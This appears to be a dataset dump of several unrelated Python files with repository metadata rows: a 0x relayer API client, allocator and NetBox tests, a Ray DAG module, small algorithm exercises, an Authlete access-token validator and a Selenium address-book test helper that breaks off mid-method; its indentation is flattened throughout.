<https://0xproject.com/docs/0x.js#types-AssetProxyId>`__
(example: "0xf47261b0" for ERC20, "0x02571792" for ERC721).
:param str maker_asset_address: The contract address for the maker asset.
:param str taker_asset_address: The contract address for the taker asset.
:param str exchange_address: Same as exchangeAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str sender_address: Same as senderAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str maker_asset_data: Same as makerAssetData in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str taker_asset_data: Same as takerAssetData in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str trader_asset_data: Same as traderAssetData in the [0x
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str maker_address: Same as makerAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str taker_address: Same as takerAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str trader_address: Same as traderAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str fee_recipient_address: Same as feeRecipientAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiOrdersResponseSchema`.
If the method is called asynchronously, returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_orders_with_http_info(**kwargs)
else:
(data) = self.get_orders_with_http_info(**kwargs)
return data
def get_orders_with_http_info(self, **kwargs):
"""get_orders
Retrieves a list of orders given query parameters. This endpoint
should be paginated. For querying an entire
orderbook snapshot, the orderbook endpoint
is recommended. If both makerAssetData and takerAssetData are
specified, returned orders will be sorted by price determined by
(takerTokenAmount/makerTokenAmount) in ascending order. By default,
orders returned by this endpoint are unsorted.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_orders_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str maker_asset_proxy_id: The maker
`asset proxy id
<https://0xproject.com/docs/0x.js#types-AssetProxyId>`__
(example: "0xf47261b0" for ERC20, "0x02571792" for ERC721).
:param str taker_asset_proxy_id: The taker asset
`asset proxy id
<https://0xproject.com/docs/0x.js#types-AssetProxyId>`__
(example: "0xf47261b0" for ERC20, "0x02571792" for ERC721).
:param str maker_asset_address: The contract address for the maker asset.
:param str taker_asset_address: The contract address for the taker asset.
:param str exchange_address: Same as exchangeAddress in the [0x
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str sender_address: Same as senderAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str maker_asset_data: Same as makerAssetData in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str taker_asset_data: Same as takerAssetData in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str trader_asset_data: Same as traderAssetData in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str maker_address: Same as makerAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str taker_address: Same as takerAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str trader_address: Same as traderAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str fee_recipient_address: Same as feeRecipientAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: RelayerApiOrdersResponseSchema.
If the method is called asynchronously, returns the request thread.
"""
local_var_params = locals()
all_params = [
"maker_asset_proxy_id",
"taker_asset_proxy_id",
"maker_asset_address",
"taker_asset_address",
"exchange_address",
"sender_address",
"maker_asset_data",
"taker_asset_data",
"trader_asset_data",
"maker_address",
"taker_address",
"trader_address",
"fee_recipient_address",
"network_id",
"page",
"per_page",
]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_orders" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
collection_formats = {}
path_params = {}
query_params = []
if "maker_asset_proxy_id" in local_var_params:
query_params.append(
("makerAssetProxyId", local_var_params["maker_asset_proxy_id"])
)
if "taker_asset_proxy_id" in local_var_params:
query_params.append(
("takerAssetProxyId", local_var_params["taker_asset_proxy_id"])
)
if "maker_asset_address" in local_var_params:
query_params.append(
("makerAssetAddress", local_var_params["maker_asset_address"])
)
if "taker_asset_address" in local_var_params:
query_params.append(
("takerAssetAddress", local_var_params["taker_asset_address"])
)
if "exchange_address" in local_var_params:
query_params.append(
("exchangeAddress", local_var_params["exchange_address"])
)
if "sender_address" in local_var_params:
query_params.append(
("senderAddress", local_var_params["sender_address"])
)
if "maker_asset_data" in local_var_params:
query_params.append(
("makerAssetData", local_var_params["maker_asset_data"])
)
if "taker_asset_data" in local_var_params:
query_params.append(
("takerAssetData", local_var_params["taker_asset_data"])
)
if "trader_asset_data" in local_var_params:
query_params.append(
("traderAssetData", local_var_params["trader_asset_data"])
)
if "maker_address" in local_var_params:
query_params.append(
("makerAddress", local_var_params["maker_address"])
)
if "taker_address" in local_var_params:
query_params.append(
("takerAddress", local_var_params["taker_address"])
)
if "trader_address" in local_var_params:
query_params.append(
("traderAddress", local_var_params["trader_address"])
)
if "fee_recipient_address" in local_var_params:
query_params.append(
(
"feeRecipientAddress",
local_var_params["fee_recipient_address"],
)
)
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
if "page" in local_var_params:
query_params.append(("page", local_var_params["page"]))
if "per_page" in local_var_params:
query_params.append(("perPage", local_var_params["per_page"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/orders",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiOrdersResponseSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def post_order(self, **kwargs):
"""post_order
Submit a signed order to the relayer.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.post_order(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param signed_order_schema: Instance of :class:`SignedOrderSchema`.
A valid signed 0x order based on the schema.
:return: None.
If the method is called asynchronously, returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.post_order_with_http_info(**kwargs)
else:
(data) = self.post_order_with_http_info(**kwargs)
return data
def post_order_with_http_info(self, **kwargs):
"""post_order
Submit a signed order to the relayer.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.post_order_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param signed_order_schema: Instance of :class:`SignedOrderSchema`
A valid signed 0x order based on the schema.
:return: None.
If the method is called asynchronously, returns the request thread.
"""
local_var_params = locals()
all_params = ["network_id", "signed_order_schema"]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_order" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
collection_formats = {}
path_params = {}
query_params = []
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "signed_order_schema" in local_var_params:
body_params = local_var_params["signed_order_schema"]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# HTTP header `Content-Type`
header_params[
"Content-Type"
] = self.api_client.select_header_content_type(["application/json"])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/order",
"POST",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
| 41.52583 | 91 | 0.630826 |
89f22eb82b36c1ca4e1014553f66004d5056e4ab | 867 | py | Python | test/test_allocator_switch.py | ntruessel/qcgc | e3ed7fc854d07aea98f5f09525ff43c867724c70 | [
"MIT"
] | 74 | 2016-05-21T17:34:20.000Z | 2021-12-23T04:28:00.000Z | test/test_allocator_switch.py | ntruessel/qcgc | e3ed7fc854d07aea98f5f09525ff43c867724c70 | [
"MIT"
] | 3 | 2017-04-03T15:18:50.000Z | 2017-04-03T15:29:55.000Z | test/test_allocator_switch.py | ntruessel/qcgc | e3ed7fc854d07aea98f5f09525ff43c867724c70 | [
"MIT"
] | 3 | 2017-01-01T05:15:06.000Z | 2020-10-07T13:37:55.000Z | from support import lib,ffi
from qcgc_test import QCGCTest
import unittest
class AllocatorSwitchTest(QCGCTest):
def test_simple_switch(self):
objs = list()
for _ in range(lib.qcgc_arena_cells_count - lib.qcgc_arena_first_cell_index - 1):
o = self.allocate(1)
self.push_root(o)
objs.append(o)
#
for o in objs:
self.assertEqual(self.get_blocktype(ffi.cast("cell_t *",o)), lib.BLOCK_WHITE)
lib.qcgc_reset_bump_ptr()
lib.qcgc_collect()
self.assertEqual(lib._qcgc_bump_allocator.ptr, ffi.NULL)
self.assertEqual(lib._qcgc_bump_allocator.end, ffi.NULL)
self.allocate(1)
self.assertEqual(lib._qcgc_bump_allocator.ptr, ffi.NULL)
self.assertEqual(lib._qcgc_bump_allocator.end, ffi.NULL)
if __name__ == "__main__":
unittest.main()
| 33.346154 | 89 | 0.665513 |
a764e90b06d37cfb03189f414afa48d868159e0b | 343 | py | Python | python/ray/experimental/dag/__init__.py | dsctt/ray | 29d94a22114b02adfd3745c4991a3ce70592dd16 | [
"Apache-2.0"
] | 1 | 2022-03-22T11:17:22.000Z | 2022-03-22T11:17:22.000Z | python/ray/experimental/dag/__init__.py | dsctt/ray | 29d94a22114b02adfd3745c4991a3ce70592dd16 | [
"Apache-2.0"
] | 32 | 2021-11-06T07:11:42.000Z | 2022-03-19T07:14:00.000Z | python/ray/experimental/dag/__init__.py | dsctt/ray | 29d94a22114b02adfd3745c4991a3ce70592dd16 | [
"Apache-2.0"
] | null | null | null | from ray.experimental.dag.dag_node import DAGNode
from ray.experimental.dag.function_node import FunctionNode
from ray.experimental.dag.class_node import ClassNode, ClassMethodNode
from ray.experimental.dag.input_node import InputNode
__all__ = [
"ClassNode",
"ClassMethodNode",
"DAGNode",
"FunctionNode",
"InputNode",
]
| 24.5 | 70 | 0.769679 |
b14343fd25759a48f7df674a18b52b9ad1862851 | 355 | py | Python | search/linear_search/python/linear_search.py | AsociTon/hacktoberfest-2018 | 1d90736ba2ef68233019230e26a3813a7d3b85f6 | [
"MIT"
] | 26 | 2018-10-01T14:52:06.000Z | 2021-05-29T06:06:50.000Z | search/linear_search/python/linear_search.py | AsociTon/hacktoberfest-2018 | 1d90736ba2ef68233019230e26a3813a7d3b85f6 | [
"MIT"
] | 89 | 2018-10-01T14:58:36.000Z | 2019-10-07T15:30:45.000Z | search/linear_search/python/linear_search.py | AsociTon/hacktoberfest-2018 | 1d90736ba2ef68233019230e26a3813a7d3b85f6 | [
"MIT"
] | 147 | 2018-10-01T12:31:40.000Z | 2021-05-09T16:12:44.000Z | print("PROGRAM FOR LINEAR SEARCH")
array = [44,1,55,23,54,6546,234,987]
found = 0
while True:
query = int(input("Enter element to search in array:"))
for i in range(len(array)):
if array[i]==query:
print("Element found at index {}".format(i))
found = 1
if found==0:
print("Element not in array") | 22.1875 | 59 | 0.577465 |
175cda87c4e862ebe6a4d0796d91303c1161bbbf | 1,937 | py | Python | leetcode_python/Hash_table/card-flipping-game.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | 18 | 2019-08-01T07:45:02.000Z | 2022-03-31T18:05:44.000Z | leetcode_python/Hash_table/card-flipping-game.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | null | null | null | leetcode_python/Hash_table/card-flipping-game.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | 15 | 2019-12-29T08:46:20.000Z | 2022-03-08T14:14:05.000Z | # V0
# V1
# http://bookshadow.com/weblog/2018/04/22/leetcode-card-flipping-game/
# IDEA : GREEDY
class Solution(object):
def flipgame(self, fronts, backs):
"""
:type fronts: List[int]
:type backs: List[int]
:rtype: int
"""
numbers = set(fronts + backs)
for n in sorted(numbers):
if all(f != n or b != n for f, b in zip(fronts, backs)):
return n
return 0
# V1'
# https://blog.csdn.net/fuxuemingzhu/article/details/82861796
class Solution:
def flipgame(self, fronts, backs):
"""
:type fronts: List[int]
:type backs: List[int]
:rtype: int
"""
s = set()
res = float('inf')
for f, b in zip(fronts, backs):
if f == b:
s.add(f)
for f in fronts:
if f not in s:
res = min(res, f)
for b in backs:
if b not in s:
res = min(res, b)
return 0 if res == float('inf') else res
# V1'
# https://www.jiuzhang.com/solution/card-flipping-game/#tag-highlight-lang-python
class Solution:
"""
@param fronts:
@param backs:
@return: nothing
find the min value on two sides of the same card across different times
"""
def flipgame(self, f, b):
same = {x for x, y in zip(f, b) if x == y}
return min([i for i in f + b if i not in same] or [0])
# V2
# Time: O(n)
# Space: O(n)
import itertools
class Solution(object):
def flipgame(self, fronts, backs):
"""
:type fronts: List[int]
:type backs: List[int]
:rtype: int
"""
same = {n for i, n in enumerate(fronts) if n == backs[i]}
result = float("inf")
for n in itertools.chain(fronts, backs):
if n not in same:
result = min(result, n)
return result if result < float("inf") else 0 | 27.671429 | 81 | 0.519876 |
dfa24d88fb0f3f9375e5185d48fde8c126c8155a | 885 | py | Python | test/test_inline_response20045.py | nrfta/python-netbox-client | 68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8 | [
"MIT"
] | null | null | null | test/test_inline_response20045.py | nrfta/python-netbox-client | 68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8 | [
"MIT"
] | null | null | null | test/test_inline_response20045.py | nrfta/python-netbox-client | 68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
NetBox API
API to access NetBox # noqa: E501
OpenAPI spec version: 2.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import netbox_client
from netbox_client.models.inline_response20045 import InlineResponse20045 # noqa: E501
from netbox_client.rest import ApiException
class TestInlineResponse20045(unittest.TestCase):
"""InlineResponse20045 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInlineResponse20045(self):
"""Test InlineResponse20045"""
# FIXME: construct object with mandatory attributes with example values
# model = netbox_client.models.inline_response20045.InlineResponse20045() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 21.585366 | 95 | 0.709605 |
d842f8a7f8056f440f893bb3c774df5137d3126a | 8,828 | py | Python | authlete/django/web/access_token_validator.py | authlete/authlete-python-django | ccdfecbac5205a7ed7c14186b5ea4552fd390d2c | [
"Apache-2.0"
] | 6 | 2019-08-10T03:07:05.000Z | 2020-11-06T13:59:29.000Z | authlete/django/web/access_token_validator.py | authlete/authlete-python-django | ccdfecbac5205a7ed7c14186b5ea4552fd390d2c | [
"Apache-2.0"
] | null | null | null | authlete/django/web/access_token_validator.py | authlete/authlete-python-django | ccdfecbac5205a7ed7c14186b5ea4552fd390d2c | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) 2019 Authlete, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the
# License.
from authlete.django.web.response_utility import ResponseUtility
from authlete.dto.introspection_action import IntrospectionAction
from authlete.dto.introspection_request import IntrospectionRequest
class AccessTokenValidator(object):
def __init__(self, api):
super().__init__()
self._api = api
self.__resetValidation()
def __resetValidation(self):
self._valid = False
self._introspectionResponse = None
self._introspectionException = None
self._errorResponse = None
@property
def api(self):
return self._api
@property
def valid(self):
"""Get the result of the access token validation.
After a call of `validate()` method, this property holds the same value
as was returned from `validate()`.
Returns:
bool : The result of the access token validation.
"""
return self._valid
@property
def introspectionResponse(self):
"""Get the response from Authlete's /api/auth/introspection API.
`validate()` method internally calls /api/auth/introspection API and sets
the response from the API to this property. Note that this property
remains `None` if the API call threw an exception, and in that error case,
the `introspectionException` property is set.
On entry of `validate()` method, this property is reset to `None`.
Returns:
authlete.dto.IntrospectionResponse
"""
return self._introspectionResponse
@property
def introspectionException(self):
"""Get the exception raised by a call to Authlete's /api/auth/introspection API.
`validate()` method internally calls Authlete's /api/auth/introspection
API. If the API call threw an exception, the exception would be set to
this property. Note that this property remains `None` if the API call
succeeds, and in that successful case, the `introspectionResponse`
property is set.
On entry of `validate()` method, this property is reset to `None`.
Returns:
Exception
"""
return self._introspectionException
@property
def errorResponse(self):
"""Get the error response that should be sent back to the client.
This property is internally set by `validate()` method when `validate()`
returns `False`. This error response complies with RFC 6750 (The OAuth
2.0 Authorization Framework: Bearer Token Usage).
On entry of `validate()` method, this property is reset to `None`.
Returns:
django.http.HttpResponse
"""
return self._errorResponse
def validate(self, accessToken, requiredScopes=None, requiredSubject=None):
"""Validate an access token.
On entry, as the first step, the following properties are reset to
False or None: `valid`, `introspectionResponse`, `introspectionException`
and `errorResponse`.
Then, this method internally calls Authlete's /api/auth/introspection
API to get information about the access token.
If the API call failed, the exception thrown by the API call is set to
the `introspectionException` property and an error response
(`500 Internal Server Error`) that should be returned to the client
application is set to the `errorResponse` property. Then, this method
set `False` to the `valid` property and returns `False`.
If the API call succeeded, the response from the API is set to the
`introspectionResponse` property. Then, this method checks the value
of the `action` parameter in the response from the API.
If the value of the `action` parameter is `OK`, this method sets `True`
to the `valid` property and returns `True`.
If the value of the `action` parameter is not `OK`, this method builds
an error response that should be returned to the client application and
sets it to the `errorResponse` property. Then, this method sets `False`
to the `valid` property and returns `False`.
If the given access token exists and has not expired, and optionally
if the access token covers all the required scopes (in case
`requiredScopes` was given) and the access token is associated with
the required subject (in case `requiredSubject` was given), this method
returns `True`. In other cases, this method returns `False`.
Args:
accessToken (str): An access token to be validated.
requiredScopes (list of str):
Scopes that the access token should have. If this parameter is not
`None`, the implementation of Authlete's /api/auth/introspection
API checks whether the access token covers all the required scopes.
On the other hand, if `None` is given, Authlete does not conduct
the validation on scopes.
requiredSubject (str):
Subject (= unique identifier of an end-user) that the access
token should be associated with. If this parameter is not `None`,
the implementation of Authlete's /api/auth/introspection API checks
whether the access token is associated with the required subject.
On the other hand, if `None` is given, Authlete does not conduct
the validation on subject.
Returns:
bool: The result of access token validation.
"""
# Reset properties that may have been set by the previous call.
self.__resetValidation()
try:
# Call Authlete's /api/auth/introspection API.
self._introspectionResponse = self.__callIntrospectionApi(
accessToken, requiredScopes, requiredSubject)
except Exception as cause:
self._introspectionException = cause
self._errorResponse = self.__buildErrorFromException(cause)
self._valid = False
return False
# The 'action' parameter in the response from /api/auth/introspection
# denotes the next action that the API caller should take.
action = self._introspectionResponse.action
if action == IntrospectionAction.OK:
# The access token is valid.
self._valid = True
return True
else:
self._errorResponse = self.__buildErrorFromResponse(self._introspectionResponse)
self._valid = False
return False
def __callIntrospectionApi(self, accessToken, requiredScopes, requiredSubject):
# Prepare a request to /api/auth/introspection API.
req = IntrospectionRequest()
req.token = accessToken
req.scopes = requiredScopes
req.subject = requiredSubject
# Call /api/auth/introspection API.
return self.api.introspection(req)
def __buildErrorFromException(self, cause):
# The value for the WWW-Authenticate header.
challenge = 'Bearer error="server_error",error_description="Introspection API call failed."'
# Build a response that complies with RFC 6749.
return ResponseUtility.wwwAuthenticate(500, challenge)
def __buildErrorFromResponse(self, response):
action = response.action
if action == IntrospectionAction.INTERNAL_SERVER_ERROR:
statusCode = 500
elif action == IntrospectionAction.BAD_REQUEST:
statusCode = 400
elif action == IntrospectionAction.UNAUTHORIZED:
statusCode = 401
elif action == IntrospectionAction.FORBIDDEN:
statusCode = 403
else:
statusCode = 500
# In error cases, the 'responseContent' parameter in the response
# from Authlete's /api/auth/introspection API contains a value for
# the WWW-Authenticate header.
challenge = response.responseContent
# Build a response that complies with RFC 6749.
return ResponseUtility.wwwAuthenticate(statusCode, challenge)
| 38.889868 | 100 | 0.660625 |
70518292d721c752d4af7eb3883098a70522725a | 10,519 | py | Python | fixture/contact.py | MsScribe/python_training | b25593e3c17710f055d8dd48678df2a7deead4f6 | [
"Apache-2.0"
] | null | null | null | fixture/contact.py | MsScribe/python_training | b25593e3c17710f055d8dd48678df2a7deead4f6 | [
"Apache-2.0"
] | null | null | null | fixture/contact.py | MsScribe/python_training | b25593e3c17710f055d8dd48678df2a7deead4f6 | [
"Apache-2.0"
] | null | null | null | from model.contact import ContactMainInfo
from selenium.webdriver.support.select import Select
import re
import random
class ContactHelper:
def __init__(self, app):
self.app = app
def open_contact_page(self):
wd = self.app.wd
if not (wd.current_url.endswith("/addressbook/") and len(wd.find_elements_by_link_text("Send e-Mail")) > 0):
wd.find_element_by_xpath("//a[text()='home']").click()
def change_field_value(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).click()
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
def change_field_value_day(self, field_date, date):
wd = self.app.wd
if date is not None:
wd.find_element_by_name(field_date).click()
Select(wd.find_element_by_name(field_date)).select_by_visible_text(date)
wd.find_element_by_xpath("//option[@value='" + date + "']").click()
def fill_contact_form(self, contactmaininfo):
# fill contact main information
self.change_field_value("firstname", contactmaininfo.firstname)
self.change_field_value("middlename", contactmaininfo.middlename)
self.change_field_value("lastname", contactmaininfo.lastname)
self.change_field_value("nickname", contactmaininfo.nickname)
self.change_field_value("title", contactmaininfo.title)
self.change_field_value("company", contactmaininfo.company)
self.change_field_value("address", contactmaininfo.homeaddress)
# fill contact phone information
self.change_field_value("home", contactmaininfo.homephone)
self.change_field_value("mobile", contactmaininfo.mobilephone)
self.change_field_value("work", contactmaininfo.workphone)
self.change_field_value("fax", contactmaininfo.faxphone)
# fill contact email information
self.change_field_value("email", contactmaininfo.email)
self.change_field_value("email2", contactmaininfo.email2)
self.change_field_value("email3", contactmaininfo.email3)
# fill contact homepage
self.change_field_value("homepage", contactmaininfo.homepage)
# fill contact bday information
self.change_field_value_day("bday", contactmaininfo.bday)
self.change_field_value_day("bmonth", contactmaininfo.bmonth)
self.change_field_value("byear", contactmaininfo.byear)
# fill contact anniversary
self.change_field_value_day("aday", contactmaininfo.aday)
self.change_field_value_day("amonth", contactmaininfo.amonth)
self.change_field_value("ayear", contactmaininfo.ayear)
# fill contact secondary information
self.change_field_value("address2", contactmaininfo.address2)
self.change_field_value("phone2", contactmaininfo.phone2)
self.change_field_value("notes", contactmaininfo.notes)
def select_group(self, group_name):
wd = self.app.wd
wd.find_element_by_name("new_group").click()
Select(wd.find_element_by_name("new_group")).select_by_visible_text(group_name)
def create(self, contactmaininfo):
wd = self.app.wd
self.open_contact_page()
# open create new contact
wd.find_element_by_link_text("add new").click()
self.fill_contact_form(contactmaininfo)
# submit contact creation
wd.find_element_by_xpath("(//input[@name='submit'])[2]").click()
self.open_contact_page()
self.contact_cache = None
def create_in_group(self, contactmaininfo, group_name):
wd = self.app.wd
self.open_contact_page()
# open create new contact
wd.find_element_by_link_text("add new").click()
self.fill_contact_form(contactmaininfo)
self.select_group(group_name)
# submit contact creation
wd.find_element_by_xpath("(//input[@name='submit'])[2]").click()
self.open_contact_page()
self.contact_cache = None
def connect_in_group(self, contact_id, group_id):
wd = self.app.wd
self.open_contact_page()
# Выбрать контакт без группы
wd.find_element_by_css_selector("input[value='%s']" % contact_id).click()
# Выбрать группу без контакта
wd.find_element_by_name("to_group").click()
Select(wd.find_element_by_name("to_group")).select_by_value(group_id)
# Сохранить
wd.find_element_by_name("add").click()
def open_contact_to_edit_by_index(self, index):
wd = self.app.wd
# open edit contact
wd.find_elements_by_xpath("//img[@alt='Edit']")[index].click()
def open_contact_to_edit_by_id(self, id):
wd = self.app.wd
# open edit contact
wd.find_element_by_css_selector("a[href='edit.php?id=%s']" % id).click()
def open_contact_to_view_by_index(self, index):
wd = self.app.wd
self.open_contact_page()
wd.find_elements_by_xpath("//td[7]/a")[index].click()
def modify_contact_by_index(self, index, contactmaininfo):
wd = self.app.wd
self.open_contact_page()
self.open_contact_to_edit_by_index(index)
self.fill_contact_form(contactmaininfo)
# submit contact creation
wd.find_element_by_name("update").click()
self.open_contact_page()
self.contact_cache = None
def modify_contact_by_id(self, id, contactmaininfo):
wd = self.app.wd
self.open_contact_page()
self.open_contact_to_edit_by_id(id)
self.fill_contact_form(contactmaininfo)
# submit contact creation
wd.find_element_by_name("update").click()
self.open_contact_page()
self.contact_cache = None
def modify_first_contact(self):
self.modify_contact_by_index(0)
def delete_contact_by_index(self, index):
wd = self.app.wd
self.open_contact_page()
# open edit contact
wd.find_elements_by_xpath("//img[@alt='Edit']")[index].click()
# delete contact
wd.find_element_by_xpath("//input[@value='Delete']").click()
self.open_contact_page()
self.contact_cache = None
def select_contact_by_id(self, id):
wd = self.app.wd
wd.find_element_by_css_selector("input[value='%s']" % id).click()
def delete_contact_by_id(self, id):
wd = self.app.wd
self.open_contact_page()
self.select_contact_by_id(id)
wd.find_element_by_xpath("//input[@value='Delete']").click()
wd.switch_to_alert().accept()
self.open_contact_page()
self.contact_cache = None
def delete_first_contact(self):
self.delete_contact_by_index(0)
def count(self):
wd = self.app.wd
self.open_contact_page()
return len(wd.find_elements_by_xpath("//img[@alt='Edit']"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.open_contact_page()
self.contact_cache = []
count = len(wd.find_elements_by_xpath("//input[@name='selected[]']"))
for i in range(2, count+2):
lastname = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']/../../td[2]").text
firstname = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']/../../td[3]").text
id = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']").get_attribute("value")
all_phones = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']/../../td[6]").text
all_emails = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']/../../td[5]").text
address = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']/../../td[4]").text
self.contact_cache.append(ContactMainInfo(id=id, firstname=firstname, lastname=lastname, all_phones_from_home_page=clear(all_phones), all_emails_from_home_page=clear(all_emails), homeaddress=address))
return list(self.contact_cache)
def get_contact_info_from_edit_page(self, index):
self.open_contact_page()
self.open_contact_to_edit_by_index(index)
return self.get_contact_info()
def get_contact_info(self):
wd = self.app.wd
firstname = wd.find_element_by_name("firstname").get_attribute("value")
lastname = wd.find_element_by_name("lastname").get_attribute("value")
id = wd.find_element_by_name("id").get_attribute("value")
homephone = wd.find_element_by_name("home").get_attribute("value")
mobilephone = wd.find_element_by_name("mobile").get_attribute("value")
workphone = wd.find_element_by_name("work").get_attribute("value")
phone2 = wd.find_element_by_name("phone2").get_attribute("value")
email = wd.find_element_by_name("email").get_attribute("value")
email2 = wd.find_element_by_name("email2").get_attribute("value")
email3 = wd.find_element_by_name("email3").get_attribute("value")
address = wd.find_element_by_name("address").get_attribute("value")
return ContactMainInfo(id=id, firstname=firstname, lastname=lastname, homephone=homephone, mobilephone=mobilephone, workphone=workphone, phone2=phone2, email=email, email2=email2, email3=email3, homeaddress=address)
def get_contact_from_view_page(self, index):
wd = self.app.wd
